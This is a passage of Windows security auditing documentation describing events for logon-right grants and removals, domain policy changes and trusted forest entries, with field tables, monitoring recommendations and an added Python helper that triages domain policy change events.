from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to local logon right
user policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Account Modified:
Account Name [Type = SID]: the SID of the security principal for which logon right was granted. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.
Access Granted:
Access Right [Type = UnicodeString]: the name of granted logon right. This event generates only for logon
rights, which are as follows:

VALUE GROUP POLICY NAME

SeNetworkLogonRight Access this computer from the network

SeRemoteInteractiveLogonRight Allow logon through Terminal Services

SeDenyNetworkLogonRight Deny access to this computer from the network

SeDenyBatchLogonRight Deny logon as a batch job

SeDenyServiceLogonRight Deny logon as a service

SeDenyInteractiveLogonRight Deny logon locally

SeDenyRemoteInteractiveLogonRight Deny logon through Terminal Services

SeBatchLogonRight Log on as a batch job

SeServiceLogonRight Log on as a service

SeInteractiveLogonRight Log on locally

Security Monitoring Recommendations
For 4717(S): System security access was granted to an account.

Actions typically performed by the SYSTEM account: This event and certain other events should be monitored
to see if they are triggered by any account other than SYSTEM.
Recommendation: Because this event is typically triggered by the SYSTEM account, we recommend that you
report it whenever “Subject\Security ID” is not SYSTEM.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each
action. Examples of high-value accounts are database administrators, built-in local administrator account,
domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Security ID” and “Account Modified\Account Name” that
correspond to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring
potential malicious actions. For example, you might need to monitor for use of an account outside of working
hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with
other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should
never be used.
Recommendation: Monitor this event with the “Subject\Security ID” that corresponds to the accounts that
should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform
actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for
accounts that are outside the whitelist. If you have specific user logon rights policies, for example, a
whitelist of accounts that can log on to certain computers, monitor this event to confirm that any “Access
Right” was granted only to the appropriate “Account Modified\Account Name.”

Accounts of different types: You might want to ensure that certain actions are performed only by certain
account types, for example, local or domain account, machine or user account, vendor or employee account, and
so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review
the “Subject\Security ID” and “Account Modified\Account Name” to see whether the account type is as expected.
For example, if non-service accounts should never be granted certain logon rights (for example,
SeServiceLogonRight), monitor this event for those accounts and rights.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not
allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another
domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain
people (accounts) should perform only limited actions, or no actions at all.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the
“Subject\Security ID” that you are concerned about. Also be sure to check “Account Modified\Account Name” to
see whether logon rights should be granted to that account. For high-value servers or other computers, we
recommend that you track this event and investigate whether the specific “Access Right” should be granted to
“Account Modified\Account Name” in each case.

Logon rights that should be restricted: You might have a list of user logon rights that you want to monitor
(for example, SeServiceLogonRight).
Recommendation: Monitor this event and compare the “Access Right” to your list of restricted rights.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

4718(S): System security access was removed from an account.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates every time local logon user right policy is changed and a logon right was removed from
an account.
You will see a unique event for every user if logon user rights were removed for multiple accounts.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4718</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T23:35:46.375134200Z" />
<EventRecordID>1049773</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="5028" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="AccessRemoved">SeInteractiveLogonRight</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made a change to local logon right user policy. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to local logon right
user policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Account Modified:
Account Name [Type = SID]: the SID of the security principal for which logon right was removed. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.
Access Removed:
Access Right [Type = UnicodeString]: the name of removed logon right. This event generates only for logon
rights, which are as follows:

VALUE GROUP POLICY NAME

SeNetworkLogonRight Access this computer from the network

SeRemoteInteractiveLogonRight Allow logon through Terminal Services

SeDenyNetworkLogonRight Deny access to this computer from the network

SeDenyBatchLogonRight Deny logon as a batch job

SeDenyServiceLogonRight Deny logon as a service

SeDenyInteractiveLogonRight Deny logon locally

SeDenyRemoteInteractiveLogonRight Deny logon through Terminal Services

SeBatchLogonRight Log on as a batch job

SeServiceLogonRight Log on as a service

SeInteractiveLogonRight Log on locally

Security Monitoring Recommendations
For 4718(S): System security access was removed from an account.

Actions typically performed by the SYSTEM account: This event and certain other events should be monitored
to see if they are triggered by any account other than SYSTEM.
Recommendation: Because this event is typically triggered by the SYSTEM account, we recommend that you
report it whenever “Subject\Security ID” is not SYSTEM.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each
action. Examples of high-value accounts are database administrators, built-in local administrator account,
domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Security ID” and “Account Modified\Account Name” that
correspond to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring
potential malicious actions. For example, you might need to monitor for use of an account outside of working
hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with
other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should
never be used.
Recommendation: Monitor this event with the “Subject\Security ID” that corresponds to the accounts that
should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform
actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for
accounts that are outside the whitelist. If you have specific user logon rights policies, for example, a
whitelist of accounts that can log on to certain computers, monitor this event to confirm that it was
appropriate that the “Access Right” was removed from “Account Modified\Account Name.”

Accounts of different types: You might want to ensure that certain actions are performed only by certain
account types, for example, local or domain account, machine or user account, vendor or employee account, and
so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review
the “Subject\Security ID” and “Account Modified\Account Name” to see whether the account type is as expected.
For example, if critical remote network service accounts have user logon rights which should never be removed
(for example, SeNetworkLogonRight), monitor this event for the “Account Modified\Account Name” and the
appropriate rights. As another example, if non-service accounts should never be granted certain logon rights
(for example, SeServiceLogonRight), you might monitor this event, because a right can be removed only after it
was previously granted.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not
allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another
domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain
people (accounts) should perform only limited actions, or no actions at all.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the
“Subject\Security ID” that you are concerned about. Also be sure to check “Account Modified\Account Name” to
see whether logon rights should be removed from that account. For high-value servers or other computers, we
recommend that you track this event and investigate whether the specific “Access Right” should be removed
from “Account Modified\Account Name” in each case.

Logon rights that should be restricted: You might have a list of user logon rights that you want to monitor
(for example, SeServiceLogonRight).
Recommendation: Monitor this event and compare the “Access Right” to your list of restricted rights. Monitor
this event to discover the removal of a right that should never have been granted, so that you can investigate
further.

“Deny” rights that should not be removed: Your organization might use “Deny” rights that should not be
removed, for example, SeDenyRemoteInteractiveLogonRight.
Recommendation: You can also monitor this event to discover the removal of “Deny” rights. When these rights
are removed, it could be an approved action, done by mistake, or part of malicious activity. These rights
include:
SeDenyNetworkLogonRight
SeDenyBatchLogonRight
SeDenyServiceLogonRight
SeDenyInteractiveLogonRight
SeDenyRemoteInteractiveLogonRight

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
4739(S): Domain Policy was changed.
4/5/2019 • 12 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when one of the following changes was made to local computer security policy:
Computer’s “\Security Settings\Account Policies\Account Lockout Policy” settings were modified.
Computer's “\Security Settings\Account Policies\Password Policy” settings were modified.
"Network security: Force logoff when logon hours expire" group policy setting was changed.
Domain functional level was changed or some other attributes changed (see details in event description).

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4739</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-02T00:45:37.587380900Z" />
<EventRecordID>1049781</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="1648" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="DomainPolicyChanged">Password Policy</Data>
<Data Name="DomainName">CONTOSO</Data>
<Data Name="DomainSid">S-1-5-21-3457937927-2839227994-823803824</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="MinPasswordAge">-</Data>
<Data Name="MaxPasswordAge">-</Data>
<Data Name="ForceLogoff">-</Data>
<Data Name="LockoutThreshold">-</Data>
<Data Name="LockoutObservationWindow">-</Data>
<Data Name="LockoutDuration">-</Data>
<Data Name="PasswordProperties">-</Data>
<Data Name="MinPasswordLength">-</Data>
<Data Name="PasswordHistoryLength">13</Data>
<Data Name="MachineAccountQuota">-</Data>
<Data Name="MixedDomainMode">-</Data>
<Data Name="DomainBehaviorVersion">-</Data>
<Data Name="OemInformation">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Change Type [Type = UnicodeString]: the type of change which was made. The format is “policy_name modified”. These are some possible values of policy_name:

VALUE  GROUP POLICY NAME \ DESCRIPTION
Lockout Policy: Computer’s “\Security Settings\Account Policies\Account Lockout Policy” settings were modified.
Password Policy: Computer's “\Security Settings\Account Policies\Password Policy” settings were modified.
Logoff Policy: "Network security: Force logoff when logon hours expire" group policy setting was changed.
-: Machine Account Quota (ms-DS-MachineAccountQuota) domain attribute was modified.

Subject:
Security ID [Type = SID]: SID of account that made a change to specific local policy. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to specific local
policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Domain:
Domain Name [Type = UnicodeString]: the name of domain for which policy changes were made.
Domain ID [Type = SID]: the SID of domain for which policy changes were made. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Changed Attributes: For attributes which were not changed the value will be “-“.
Min. Password Age [Type = UnicodeString]: “\Security Settings\Account Policies\Password Policy\Minimum
password age” group policy. Numeric value.
Max. Password Age [Type = UnicodeString]: “\Security Settings\Account Policies\Password
Policy\Maximum password age” group policy. Numeric value.
Force Logoff [Type = UnicodeString]: “\Security Settings\Local Policies\Security Options\Network security:
Force logoff when logon hours expire” group policy.
Lockout Threshold [Type = UnicodeString]: “\Security Settings\Account Policies\Account Lockout
Policy\Account lockout threshold” group policy. Numeric value.
Lockout Observation Window [Type = UnicodeString]: “\Security Settings\Account Policies\Account
Lockout Policy\Reset account lockout counter after” group policy. Numeric value.
Lockout Duration [Type = UnicodeString]: “\Security Settings\Account Policies\Account Lockout
Policy\Account lockout duration” group policy. Numeric value.
Password Properties [Type = UnicodeString]:

VALUE  GROUP POLICY SETTINGS
0: \Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption - Disabled. \Security Settings\Account Policies\Password Policy\Password must meet complexity requirements - Disabled.
1: \Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption - Disabled. \Security Settings\Account Policies\Password Policy\Password must meet complexity requirements - Enabled.
16: \Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption - Enabled. \Security Settings\Account Policies\Password Policy\Password must meet complexity requirements - Disabled.
17: \Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption - Enabled. \Security Settings\Account Policies\Password Policy\Password must meet complexity requirements - Enabled.

Min. Password Length [Type = UnicodeString]: “\Security Settings\Account Policies\Password Policy\Minimum password length” group policy. Numeric value.
Password History Length [Type = UnicodeString]: “\Security Settings\Account Policies\Password Policy\Enforce password history” group policy. Numeric value.
Machine Account Quota [Type = UnicodeString]: ms-DS-MachineAccountQuota domain attribute was modified. Numeric value.
Mixed Domain Mode [Type = UnicodeString]: there is no information about this field in this document.
Domain Behavior Version [Type = UnicodeString]: msDS-Behavior-Version domain attribute was modified. Numeric value. Possible values:

VALUE  IDENTIFIER  DOMAIN CONTROLLER OPERATING SYSTEMS THAT ARE ALLOWED IN THE DOMAIN
0 DS_BEHAVIOR_WIN2000: Windows 2000 Server operating system, Windows Server 2003 operating system, Windows Server 2008 operating system, Windows Server 2008 R2 operating system, Windows Server 2012 operating system, Windows Server 2012 R2 operating system, Windows Server 2016 operating system
1 DS_BEHAVIOR_WIN2003_WITH_MIXED_DOMAINS: Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
2 DS_BEHAVIOR_WIN2003: Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
3 DS_BEHAVIOR_WIN2008: Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
4 DS_BEHAVIOR_WIN2008R2: Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
5 DS_BEHAVIOR_WIN2012: Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
6 DS_BEHAVIOR_WIN2012R2: Windows Server 2012 R2, Windows Server 2016
7 DS_BEHAVIOR_WINTHRESHOLD: Windows Server 2016

OEM Information [Type = UnicodeString]: there is no information about this field in this document.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in the table below:

PRIVILEGE NAME (USER RIGHT GROUP POLICY NAME): DESCRIPTION

SeAssignPrimaryTokenPrivilege (Replace a process-level token): Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.

SeAuditPrivilege (Generate security audits): With this privilege, the user can add entries to the security log.

SeBackupPrivilege (Back up files and directories): Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.

SeChangeNotifyPrivilege (Bypass traverse checking): Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.

SeCreateGlobalPrivilege (Create global objects): Required to create named file mapping objects in the global namespace during Terminal Services sessions.

SeCreatePagefilePrivilege (Create a pagefile): With this privilege, the user can create and change the size of a pagefile.

SeCreatePermanentPrivilege (Create permanent shared objects): Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege (Create symbolic links): Required to create a symbolic link.

SeCreateTokenPrivilege (Create a token object): Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.

SeDebugPrivilege (Debug programs): Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.

SeEnableDelegationPrivilege (Enable computer and user accounts to be trusted for delegation): Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.

SeImpersonatePrivilege (Impersonate a client after authentication): With this privilege, the user can impersonate other accounts.

SeIncreaseBasePriorityPrivilege (Increase scheduling priority): Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.

SeIncreaseQuotaPrivilege (Adjust memory quotas for a process): Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.

SeIncreaseWorkingSetPrivilege (Increase a process working set): Required to allocate more memory for applications that run in the context of users.

SeLoadDriverPrivilege (Load and unload device drivers): Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.

SeLockMemoryPrivilege (Lock pages in memory): Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).

SeMachineAccountPrivilege (Add workstations to domain): With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege (Perform volume maintenance tasks): Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege (Profile single process): Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege (Modify an object label): Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege (Force shutdown from a remote system): Required to shut down a system using a network request.

SeRestorePrivilege (Restore files and directories): Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent objects permissions when restoring backed up files and directories and determines which users can set any valid security principal as the owner of an object.

SeSecurityPrivilege (Manage auditing and security log): Required to perform a number of security-related functions, such as controlling and viewing audit events in security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege (Shut down the system): Required to shut down a local system.

SeSyncAgentPrivilege (Synchronize directory service data): This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege (Modify firmware environment values): Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege (Profile system performance): Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege (Change the system time): Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege (Take ownership of files or other objects): Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege (Act as part of the operating system): This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege (Change the time zone): Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege (Access Credential Manager as a trusted caller): Required to access Credential Manager as a trusted caller.

SeUndockPrivilege (Remove computer from docking station): Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege (Not applicable): Required to read unsolicited input from a terminal device.

Security Monitoring Recommendations
For 4739(S): Domain Policy was changed.
Any settings changes to “Account Lockout Policy”, “Password Policy”, or “Network security: Force logoff when logon hours expire”, plus any domain functional level and attributes changes that are reported by this event, must be monitored and an alert should be triggered. If this change was not planned, investigate the reason for the change.
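Added example, not part of the original reference: a Python triage helper for 4739 that parses the event as rendered in the Event XML above, keeps only the Changed Attributes that are not “-”, decodes Password Properties with the 0/1/16/17 table, and returns a record for the alert the recommendation asks for. The first sample event reproduces the values from the reference's XML; the second, with PasswordProperties set to 16, is constructed to show a weakening change.

```python
"""Triage helper for Windows Security event 4739 (Domain Policy was changed).

Added example (not from the reference). The field names and the
PasswordProperties value table come from the 4739 field descriptions.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# "Changed Attributes" of event 4739; unchanged ones are rendered as "-".
CHANGED_ATTRIBUTE_FIELDS = (
    "MinPasswordAge", "MaxPasswordAge", "ForceLogoff", "LockoutThreshold",
    "LockoutObservationWindow", "LockoutDuration", "PasswordProperties",
    "MinPasswordLength", "PasswordHistoryLength", "MachineAccountQuota",
    "MixedDomainMode", "DomainBehaviorVersion", "OemInformation",
)

# Password Properties value table from the reference:
#   0  reversible encryption Disabled, complexity Disabled
#   1  reversible encryption Disabled, complexity Enabled
#   16 reversible encryption Enabled,  complexity Disabled
#   17 reversible encryption Enabled,  complexity Enabled
# i.e. bit 0x1 = complexity required, bit 0x10 = reversible encryption.
COMPLEXITY_BIT = 0x1
REVERSIBLE_ENCRYPTION_BIT = 0x10


def event_data(xml_text):
    """Return {Data@Name: text} for the EventData of one Event element."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}


def event_id(xml_text):
    return int(ET.fromstring(xml_text).find("e:System/e:EventID", NS).text)


def decode_password_properties(value):
    v = int(value)
    return {
        "complexity_required": bool(v & COMPLEXITY_BIT),
        "reversible_encryption": bool(v & REVERSIBLE_ENCRYPTION_BIT),
    }


def triage_4739(xml_text):
    """Return a record describing what changed and who changed it."""
    if event_id(xml_text) != 4739:
        raise ValueError("not a 4739 event")
    data = event_data(xml_text)
    changed = {k: data[k] for k in CHANGED_ATTRIBUTE_FIELDS if data.get(k, "-") != "-"}
    findings = []
    if "PasswordProperties" in changed:
        props = decode_password_properties(changed["PasswordProperties"])
        if props["reversible_encryption"]:
            findings.append("reversible password encryption enabled")
        if not props["complexity_required"]:
            findings.append("password complexity not required")
    return {
        "policy": data["DomainPolicyChanged"],
        "domain": data["DomainName"],
        "subject": f'{data["SubjectDomainName"]}\\{data["SubjectUserName"]}',
        "subject_sid": data["SubjectUserSid"],
        "logon_id": data["SubjectLogonId"],
        "changed": changed,
        "findings": findings,
        # The reference says every 4739 must be monitored and alerted on.
        "alert": True,
    }


def sample_event(policy, **attrs):
    """Constructed 4739 Event XML using the reference's example values as defaults."""
    fields = {k: "-" for k in CHANGED_ATTRIBUTE_FIELDS}
    fields.update(attrs)
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4739</EventID>
<Computer>DC01.contoso.local</Computer></System>
<EventData><Data Name="DomainPolicyChanged">{policy}</Data>
<Data Name="DomainName">CONTOSO</Data>
<Data Name="DomainSid">S-1-5-21-3457937927-2839227994-823803824</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data><Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data><Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="PrivilegeList">-</Data>{data}</EventData></Event>"""


# Event from the reference: Password Policy changed, only PasswordHistoryLength (13) set.
PAGE_EVENT = sample_event("Password Policy", PasswordHistoryLength="13")
# Constructed variant: reversible encryption turned on (PasswordProperties = 16).
WEAKENED_EVENT = sample_event("Password Policy", PasswordProperties="16")

if __name__ == "__main__":
    for ev in (PAGE_EVENT, WEAKENED_EVENT):
        print(triage_4739(ev))
```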
4864(S): A namespace collision was detected.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event is generated when a namespace collision was detected.
There is no example of this event in this document.
Subcategory: Audit Authentication Policy Change
Event Schema:
A namespace collision was detected.
Target Type:%1
Target Name:%2
Forest Root:%3
Top Level Name:%4
DNS Name:%5
NetBIOS Name:%6
Security ID:%7
New Flags:%8
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations
There is no recommendation for this event in this document.
4865(S): A trusted forest information entry was added.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when a new trusted forest information entry was added.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4865</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-02T03:11:33.397715700Z" />
<EventRecordID>1049810</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4808" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ForestRoot">Fabrikam.local</Data>
<Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="OperationId">0x648620</Data>
